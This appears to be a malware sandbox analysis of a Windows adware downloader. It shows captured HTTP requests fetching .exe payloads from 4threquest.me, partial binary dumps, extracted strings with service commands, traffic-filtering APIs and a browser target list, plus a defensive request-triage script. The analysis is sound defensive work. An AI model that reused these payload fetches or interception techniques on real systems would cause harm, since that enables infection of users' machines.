GET /v4/sof-ient/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action0=xa.geoip&action2=visit&update0=ref,pcm&update1=nation,us&update2=language,en&update3=version,2.8.8.2102&update4=chptid,pcm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:58 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.53 ms","message":"store 3 action and 5 upd
ate "}..0..
....



GET /v4/sof-ient/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action1=install.pcm HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:58 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.54 ms","message":"store 1 action and 0 upd
ate "}..0..HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 23 Apr 201
5 07:24:58 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encod
ing: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-
version: v4..48..{"stats":"ok","time":"0.54 ms","message":"store 1 act
ion and 0 update "}..0..


GET /310714d/240714_ps.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:27 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 523264
Content-Description: File Transfer
Content-Disposition: attachment; filename="240714_ps.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..i
u..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i..................
......PE..L......K.................Z....... ...0.......p....@.........
................. ...............................................s....
......................................................................
.............p...............................text....X.......Z........
.......... ..`.rdata.......p.......^..............@[email protected].......
.....p..............@....ndata.......p...........................rsrc.
...............t..............@..@....................................
......................................................................
......................................................................
......................................................................
......................................................................
............................................U....\.}..t .}.F.E.u..H...
[email protected]@..e...E..E.P.u...Pr@
..}[email protected]... M.......M....3.....FQ.....NU..M.....
.....VT..U.....FP..E...............E.P.M...Hp@[email protected]
....E..9}[email protected].}[email protected]..
[email protected]@.W...E..E.h [email protected]...\r@._^3.
[.....L$...nD...Si.. ..VW.T.....tO.q.3.;5.nD.sB..i.. ...D.......t.G...
..t...O..t .....u...3....3...F.. ..;5.nD.r._^[...U..QQ.U.SV..i.. .

<<< skipped >>>

GET /310714d/310714_a9.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:29 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 503904
Content-Description: File Transfer
Content-Disposition: attachment; filename="310714_a9.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$...........;...;...
;...]r_.|....<V.<....Z\......Z^.p....Z_.....2...(...;.......]rB.
6...]rX.:...;...:...]r].:...Rich;...................PE..L...X,.U......
...........<...T......3o.......P....@..............................
[email protected].........................
.`........;..`[email protected].......
........................text....:.......<.................. ..`.rda
ta...(...P...*...@..............@[email protected]............
[email protected]...............................@[email protected]..................
[email protected]......................................................
......................................................................
......................................................................
......................................................................
......................................................................
..U..V...y-...E..t.V..6.......^]...................O-.............U..j
.h.;E.d.....P.... .F.3..E.VWP.E.d........}.j..u...&...E......F......F.
..F......F..3..F.....f.F..F.f.F .F$.F(.F,.F0.E....u(.E.P.M..E...F..P,.
.h.YF..E.P.E. bE..%e..WV..#........M.d......Y_^.M.3..4 ....]....V..V..
$...F,.....t.P..3......F,.....F$..t.P..3......F$.....F...t.P..3......F
......F...t.P..3......F......F...t.P..3......F......F...t.P..3......F.
......^..%....U..V.u..... .... bE...^]........U...E..V....daE.t.V.

<<< skipped >>>

GET /310714d/310714_am2.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: 4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:33 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 311296
Content-Description: File Transfer
Content-Disposition: attachment; filename="310714_am2.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$........x....u...u.
..u..a....u..o....u.3W....u.......u.....7.u.......u..a....u...t.*.u...
....u.......u.......u.Rich..u.........................PE..L......T....
......................................@...............................
........@..................................|..........(...............
.........)[email protected].....
.......................text............................... ..`.rdata..
............................@[email protected]....:...........v..............@.
...rsrc...(...........................@[email protected]...).......*..........
[email protected]..........................................................
......................................................................
......................................................................
......................................................................
............................................j...4.....................
..........t.j.j.j.P....D...P....D.....................3.9.............
....t.j.j.j.P....D...P....D....>....................t.j.j.j.P....D.
..P....D.....3..H..H.........3....D....D..|.D..x.D....D..x.D..........
........=\.D..u.3...=`.D...L.D.s..L.D..U..j.h..C.d.....PSVW.D.D.3.P.E.
d......E..}....LD......3.3..O.._.f.W..][email protected]..^.f....
.Q..U....I.f.....f;.u. M...Q.*....GtHJD.................._x...........
................................._l._p.......Gh....._`._d.........

<<< skipped >>>

GET /services/stores?dummy=526 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.related.deals
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:14 GMT
Content-Type: text/html
Connection: close
P3P: CP="Potato"
Access-Control-Allow-Headers: X-Requested-With
Access-Control-Allow-Origin: *
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: EU
related.deals.aliexpress.com.viagens.americanas.com.br.americanas.com.
br.azulviagens.com.br.casasbahia.com.br.catho.com.br.centauro.com.br.c
itylar.com.br.colcci.com.br.colombo.com.br.cvc.com.br.dafiti.com.br.de
colar.com.extra.com.br.fastshop.com.br.fnac.com.br.forum.com.br.girafa
.com.br.voegol.com.br.insinuante.com.br.kanui.com.br.lenovo.com.br.loj
askd.com.br.magazineluiza.com.br.marisa.com.br.megamamute.com.br.mobly
.com.br.netshoes.com.br.polishop.com.br.pontofrio.com.br.posthaus.com.
br.ricardoeletro.com.br.rihappy.com.br.samsclub.com.br.saraiva.com.br.
sepha.com.br.sephora.com.br.shopfato.com.br.shoptime.com.br.submarino.
com.br.submarinoviagens.com.br.tam.com.br.walmart.com.br...
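Several request-level traits recur across the capture above and are cheap to check in a proxy log or PCAP extract: the payload fetches from 4threquest.me carry the NSIS Inetc plugin's `NSIS_Inetc (Mozilla)` user-agent and a per-campaign `aleaTokenID` on an .exe path; the xa.xingcloud.com beacons use an MSIE string with a non-browser suffix (`Pi/3.1415926` or `in my heart of heart.`); and the device id in those beacons is evidently built from the disk model, since `VMwareXVirtualXIDEXHardXDrive_00000000000000000001` is the sandbox's VMware virtual disk with spaces replaced, so that particular value is a sandbox artefact rather than a stable indicator. The following is an added example, not code from the page or from any vendor tool, that parses raw HTTP/1.x requests and returns the reasons each would be flagged. The three sample requests are constructed from requests in this capture with the hXXp/VVV defanging undone.

```python
import re
from typing import Dict, List

# Constructed samples modelled on requests seen in the capture.
SAMPLE_REQUESTS = [
    "GET /310714d/240714_ps.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2N HTTP/1.1\r\n"
    "User-Agent: NSIS_Inetc (Mozilla)\r\n"
    "Host: 4threquest.me\r\n"
    "Connection: Keep-Alive\r\n"
    "Cache-Control: no-cache\r\n\r\n",
    "GET /v4/sof-installer/VMwareXVirtualXIDEXHardXDrive_00000000000000000001"
    "?action=pcm.installer.istartsurf.hp HTTP/1.1\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) Pi/3.1415926\r\n"
    "Host: xa.xingcloud.com\r\n"
    "Connection: Keep-Alive\r\n\r\n",
    "GET /mobile/mt-core.js HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n"
    "Host: www.mobimidia.com\r\n"
    "Connection: Keep-Alive\r\n\r\n",
]

# Indicators lifted from the capture. The VMware-derived id is matched only to
# show the class of value; on a real host it would be that machine's disk model.
DOWNLOADER_UA = "NSIS_Inetc"
UA_TAIL = re.compile(r"Trident/5\.0\)\s+(Pi/3\.1415926|in my heart of heart\.)$")
TELEMETRY_HOSTS = {"xa.xingcloud.com"}
DISK_DERIVED_ID = re.compile(r"/VMwareXVirtualXIDEXHardXDrive_\d+")


def parse_request(raw: str) -> Dict[str, str]:
    """Split a raw HTTP/1.x request into method, target and lower-cased headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    fields = {"method": method, "target": target}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            fields[name.strip().lower()] = value.strip()
    return fields


def triage(raw: str) -> List[str]:
    """Return the reasons a request would be flagged; empty means clean."""
    req = parse_request(raw)
    ua = req.get("user-agent", "")
    host = req.get("host", "").lower()
    path = req["target"].split("?", 1)[0]
    reasons = []
    if ua.startswith(DOWNLOADER_UA):
        reasons.append("nsis-inetc-download")      # installer plugin fetching a payload
    if UA_TAIL.search(ua):
        reasons.append("tampered-msie-ua")         # browser string with a non-browser tail
    if host in TELEMETRY_HOSTS:
        reasons.append("install-telemetry-host")
    if DISK_DERIVED_ID.search(req["target"]):
        reasons.append("sandbox-derived-device-id")
    if "aleaTokenID=" in req["target"] and path.endswith(".exe"):
        reasons.append("tokenised-exe-fetch")
    return reasons


if __name__ == "__main__":
    for raw in SAMPLE_REQUESTS:
        req = parse_request(raw)
        print(req["host"], req["target"][:40], triage(raw) or "-")
```

The user-agent checks are the ones worth keeping as signatures: `NSIS_Inetc` is the plugin's default string and survives across campaigns, and the MSIE suffixes are fixed in the installer's binary. The host and device-id checks describe this sample only.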


The Trojan connects to the servers at the following location(s):

%original file name%.exe_1396:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
ShowWebInPopUp
\LOCALS~1\Temp\nst3.tmp\nsWeb.dll
B3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N_gs.exe
ndex.php /ta /ci 9664 /i MyBestOffersTodayBR
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp\nsWeb.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nst3.tmp
n%D,3
GetProcessHeap
OLEAUT32.dll
CreateURLMoniker
urlmon.dll
WININET.dll
nsWeb.dll
ShowWebInPage
MSHTML.DLL
1 1$1(1,1014181<1@1
t%SSj
GetWindowsDirectoryW
RegEnumKeyExW
RegEnumKeyExA
RegCreateKeyExW
RegOpenKeyExW
RegDeleteKeyW
registry.dll
_CopyKey
_CreateKey
_DeleteKey
_DeleteKeyEmpty
_KeyExists
_MoveKey
_RestoreKey
_SaveKey
.reloc
System.dll
callback%d
@.reloc
d2.kX
W.uje
nst3.tmp
\LOCALS~1\Temp\nst3.tmp
3886080
c:\%original file name%.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N
%original file name%.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nso1.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
-2063532032
-2147284440
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><assemblyIdentity version="1.0.0.0" processorArchitecture="X86" name="Nullsoft.NSIS.exehead" type="win32"/><description>Nullsoft Install System v2.46</description><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="highestAvailable" uiAccess="false"/></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"><application><supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/><supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/></application></compatibility></assembly>
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
%s /s "%s"
regedit.exe
REG_KEY
%s%s%s
x,
=hex(%x):
=dword:x
="%s"
[%s\%s]
[-%s\%s]
Windows Registry Editor Version 5.00
7.8.5.9

%original file name%.exe_1396_rwx_01134000_00001000:

callback%d

q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe_1316:

.text
`.rdata
@.data
.ndata
.rsrc
uDSSh
.DEFAULT\Control Panel\International
Software\Microsoft\Windows\CurrentVersion
GetWindowsDirectoryA
KERNEL32.dll
ExitWindowsEx
USER32.dll
GDI32.dll
SHFileOperationA
ShellExecuteA
SHELL32.dll
RegEnumKeyA
RegCreateKeyExA
RegCloseKey
RegDeleteKeyA
RegOpenKeyExA
ADVAPI32.dll
COMCTL32.dll
ole32.dll
VERSION.dll
verifying installer: %d%%
unpacking data: %d%%
... %d%%
hXXp://nsis.sf.net/NSIS_Error
~nsu.tmp
%u.%u%s%s
RegDeleteKeyExA
%s=%s
*?|<>/":
ShowWebInPopUp
\LOCALS~1\Temp\nsq6.tmp\nsWeb.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq6.tmp\nsWeb.dll
%Program Files%
\nsWeb.dll
hXXp://goo.gl/Bw14Po
$$\wininit.ini
@.reloc
n%D,3
GetProcessHeap
OLEAUT32.dll
CreateURLMoniker
urlmon.dll
WININET.dll
nsWeb.dll
ShowWebInPage
MSHTML.DLL
1 1$1(1,1014181<1@1
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq6.tmp
nsq6.tmp
:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq6.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N\q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Temp\O15O8WbPqkjNWDUfU8L4Mr8GpVb15O8WbPqkjNWDUfU8L4Mr8GpVb
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Temp\Oq2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N
q2g54WndLShXYB3BIA5JVfobjOB2N_mb_1.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsl4.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
8.9.3.9

310714_is.exe_1880:

.idata
.rdata
P.reloc
P.rsrc
SYh%f
kernel32.dll
.DEFAULT\Control Panel\International
File I/O error %d
lzmadecompsmall: Compressed data is corrupted (%d)
lzmadecompsmall: %s
LzmaDecode failed (%d)
shell32.dll
/SL5="$%x,%d,%d,
Inno Setup Setup Data (5.5.0)
Inno Setup Messages (5.5.0)
user32.dll
oleaut32.dll
advapi32.dll
RegOpenKeyExA
RegCloseKey
GetWindowsDirectoryA
MsgWaitForMultipleObjects
ExitWindowsEx
comctl32.dll
name="JR.Inno.Setup"
version="1.0.0.0"
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
<windowsSettings>
<dpiAware xmlns="hXXp://schemas.microsoft.com/SMI/2005/WindowsSettings">true</dpiAware>
</windowsSettings>
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"/>
!'%s' is not a valid integer value('%s' is not a valid floating point value
'%s' is not a valid date
'%s' is not a valid time!'%s' is not a valid date and time
I/O error %d
Integer overflow Invalid floating point operation
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Operation aborted%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
External exception %x
Web Setup
5.3.2.4
2.0.7

310714_is.tmp_1388:

.text
`.rdata
@.data
.rsrc
@.reloc
c:\Projects\Basic\Release\Basic.pdb
KERNEL32.dll
USER32.dll
_amsg_exit
_wcmdln
_crt_debugger_hook
MSVCR90.dll
cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
<assemblyIdentity type="win32" name="Microsoft.VC90.CRT" version="9.0.21022.8" processorArchitecture="x86" publicKeyToken="1fc8b3b9a1e18e3b"></assemblyIdentity>

CashReminder.exe_1232:

.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
TURLAction
HelpKeywordp
TURLDownloadStatus
dsBeginSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
TDownLoadURL
URLMON.DLL
URLDownloadToFileA
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeywordT
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecutepWE
content-security-policy-report-only
127.0.0.1
255.0.0.0
ServiceExecute
\P_StoreList.txt
\P_CheckUpdate.txt
\cr_update.exe
hXXp://VVV.related.deals/services/rules?dummy=
hXXp://VVV.related.deals/services/stores?dummy=
hXXp://VVV.related.deals/services/update/
\P_RuleList.txt
[N] ProductKey :
cmd.exe /c net start CashReminder
cmd.exe /c net stop CashReminder
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
ReportEventA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
wsock32.dll
nfapi.dll
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpSetConnectionState
psapi.dll
ProtocolFilters.dll
KWindows
UrlMon
OnExecute
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Alt  Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation

WNet.exe_2284:

.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
TURLAction
HelpKeywordp
TURLDownloadStatus
dsBeginSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
TDownLoadURL
URLMON.DLL
URLDownloadToFileA
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeywordT
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreview
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecutepWE
127.0.0.1
255.0.0.0
ServiceExecute
\P_CheckUpdate.txt
NOVA UPDATE DISPONIVEL! URL:
\po_update.exe
hXXp://VVV.brsoftwarellc.com/services/rules.txt?dummy=
hXXp://VVV.brsoftwarellc.com/services/update.php?v=
&key=
\P_RuleList.txt
[E] ProductKey :
[N] ProductKey :
cmd.exe /c net start WNet
cmd.exe /c net stop WNet
user32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
ReportEventA
RegFlushKey
RegCreateKeyExA
WinExec
GetCPInfo
version.dll
gdi32.dll
SetViewportOrgEx
UnhookWindowsHookEx
SetWindowsHookExA
MsgWaitForMultipleObjects
MapVirtualKeyA
LoadKeyboardLayoutA
GetKeyboardState
GetKeyboardLayoutList
GetKeyboardLayout
GetKeyState
GetKeyNameTextA
EnumWindows
EnumThreadWindows
ActivateKeyboardLayout
wsock32.dll
nfapi.dll
nf_tcpDisableFiltering
nf_setTCPTimeout
nf_tcpClose
nf_tcpPostReceive
nf_tcpPostSend
nf_tcpSetConnectionState
psapi.dll
ProtocolFilters.dll
KWindows
UrlMon
OnExecute
No help keyword specified.
No help found for %s#No context-sensitive help installed$No topic-based help system installed
shutdown(Service failed in custom message(%d): %s
Service installed successfully/Service "%s" failed to install with error: "%s" Service uninstalled successfully1Service "%s" failed to uninstall with error: "%s"
Error downloading URL: %s
Unable to load %s"Unable to find a Table of Contents
Alt  Clipboard does not support Icons
Cannot open clipboard/Menu '%s' is already being used by another form
Service failed on %s: %s
Unsupported clipboard format
Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window
Error reading %s%s%s: %s
Failed to get data for '%s'
Failed to set data for '%s'
Resource %s not found
%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group
Property %s does not exist
Thread creation error: %s
Thread Error: %s (%d)
Class %s not found
A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates
Cannot create file "%s". %s
Cannot open file "%s". %s
Invalid stream format$''%s'' is not a valid component name
Invalid data type for '%s' List capacity out of bounds (%d)
List count out of bounds (%d)
List index out of bounds (%d)
Ancestor for '%s' not found
Cannot assign a %s to a %s
Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
System Error. Code: %d.
Invalid variant operation%Invalid variant operation (%s%.8x)
%s5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)
Operation not supported
External exception %x
Interface not supported
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction(Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'"Variant method calls not supported
!'%s' is not a valid integer value
I/O error %d
Integer overflow Invalid floating point operation

ActSys.exe_2648:

.idata
.rdata
P.reloc
P.rsrc
kernel32.dll
Windows
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
$*@@@*$@@@$ *@@* $@@($*)@-$*@@$-*@@$*-@@(*$)@-*$@@*-$@@*$-@@-* $@-$ *@* $-@$ *-@$ -*@*- $@($ *)(* $)
oleaut32.dll
EVariantBadIndexError
ssShift
htKeyword
EInvalidOperation
u%CNu
%s[%d]
%s_%d
EInvalidGraphicOperation
UhWEB
USER32.DLL
comctl32.dll
uxtheme.dll
%s%s%s%s%s%s%s%s%s%s
Proportional
MAPI32.DLL
TURLAction
HelpKeyword<
TURLDownloadStatus
dsBeginSyncOperation
dsEndSyncOperation
dsFilterReportMIMEType
TDownLoadURL
URLMON.DLL
URLDownloadToFileA
OnKeyDown
OnKeyPress
OnKeyUp
IE(AL("%s",4),"AL(\"%0:s\",3)","JK(\"%1:s\",\"%0:s\")")
JumpID("","%s")
TKeyEvent
TKeyPressEvent
HelpKeyword
crSQLWait
%s (%s)
imm32.dll
AutoHotkeys
ssHotTrack
TWindowState
poProportional
TWMKey
KeyPreviewx4D
WindowState
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
User32.dll
Password
OnExecute<XE
iexplore.exe
firefox.exe
chrome.exe
safari.exe
opera.exe
netscape.exe
torch.exe
seamonkey.exe
k-meleon.exe
konqueror.exe
maxthon.exe
flock.exe
lunascape.exe
amaya.exe
midori.exe
kidzui.exe
rockmelt.exe
sbrowser.exe
slimbrowser.exe
kidrocket.exe
epic.exe
ironbrowser.exe
comodo.exe
comododragon.exe
crazybrowser.exe
arora.exe
shenzbrowser.exe
enigmabrowser.exe
avant.exe
avantbrowser.exe
orca.exe
xbbrowser.exe
xbrowser.exe
sleipnir.exe
spacetime.exe
3dbrowse.exe
bitty.exe
java.exe
grail.exe
lynx.exe
twb.exe
tt.exe
pinkbrowser.exe
nuke.exe
acoo.exe
palemoon.exe
slimboat.exe
dooble.exe
menubox.exe
chromium.exe
ultrabrowser.exe
zac.exe
kylo.exe
morequick.exe
wyzo.exe
xombrero.exe
qupzilla.exe
cometbird.exe
qtweb.exe
deepnet.exe
xtravo.exe
smartbro.exe
jumpto.exe
weblock4kids.exe
weblock.exe
